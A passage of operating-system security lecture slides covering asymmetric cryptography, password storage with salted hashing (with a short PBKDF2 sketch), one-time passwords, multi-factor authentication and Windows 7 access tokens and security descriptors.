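print(pow(c, kd, N))        # 69 -- decrypt with the private key: c^kd mod N
```

Such tiny primes are for illustration only; as the slide notes, real keys use primes of hundreds of bits, so that factoring N is infeasible.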
86. Cryptography (Cont.)
Note symmetric cryptography based on transformations,
asymmetric based on mathematical functions
Asymmetric much more compute intensive
Typically not used for bulk data encryption
87. User Authentication
Crucial to identify user correctly, as protection systems depend on user ID
User identity most often established through passwords, can be considered a
special case of either keys or capabilities
Passwords must be kept secret
Frequent change of passwords
History to avoid repeats
Use of “non-guessable” passwords
Log all invalid access attempts (but not the passwords themselves)
Unauthorized transfer
Passwords may also either be encrypted or allowed to be used only once
Does encrypting passwords solve the exposure problem?
Might solve sniffing
Consider shoulder surfing
Consider Trojan horse keystroke logger
How are passwords stored at authenticating site?
88. Passwords
Encrypt to avoid having to keep secret
But keep secret anyway (e.g. Unix uses the superuser-only readable file
/etc/shadow)
Use algorithm easy to compute but difficult to invert
Only encrypted password stored, never decrypted
Add “salt” to avoid the same password being encrypted to the same value
One-time passwords
Use a function based on a seed to compute a password, both user and computer
Hardware device / calculator / key fob to generate the password
Changes very frequently
Biometrics
Some physical attribute (fingerprint, hand scan)
Multi-factor authentication
Need two or more factors for authentication
i.e. USB “dongle”, biometric measure, and password
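The salted one-way password storage described above can be sketched with the standard library's PBKDF2; the function names and iteration count are illustrative choices, not a prescription:

```python
# A sketch of salted one-way password storage, as described above:
# only the salt and the hash are stored, never the cleartext password,
# and the hash function is easy to compute but hard to invert.

import hashlib
import hmac
import os

def store_password(password):
    salt = os.urandom(16)                  # per-user salt: same password,
    digest = hashlib.pbkdf2_hmac(          # different stored value
        "sha256", password.encode(), salt, 100_000)
    return salt, digest

def check_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, digest)  # constant-time compare

salt, digest = store_password("correct horse")
print(check_password("correct horse", salt, digest))  # True
print(check_password("wrong guess", salt, digest))    # False
```

The salt is what defeats precomputed dictionaries: two users with the same password get different stored hashes, so each guess must be hashed per user.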
90. Example: Windows 7
Security is based on user accounts
Each user has unique security ID
Login to ID creates security access token
Includes security ID for user, for user’s groups, and special
privileges
Every process gets copy of token
System checks token to determine if access allowed or
denied
Uses a subject model to ensure access security
A subject tracks and manages permissions for each program that a
user runs
Each object in Windows has a security attribute defined by a security
descriptor
For example, a file has a security descriptor that indicates the
access permissions for all users
91. Example: Windows 7 (Cont.)
Windows added mandatory integrity controls – assigns an integrity
label to each securable object and subject
Subject must have access requested in discretionary access-
control list to gain access to object
Security attributes described by security descriptor
Owner ID, group security ID, discretionary access-control list,
system access-control list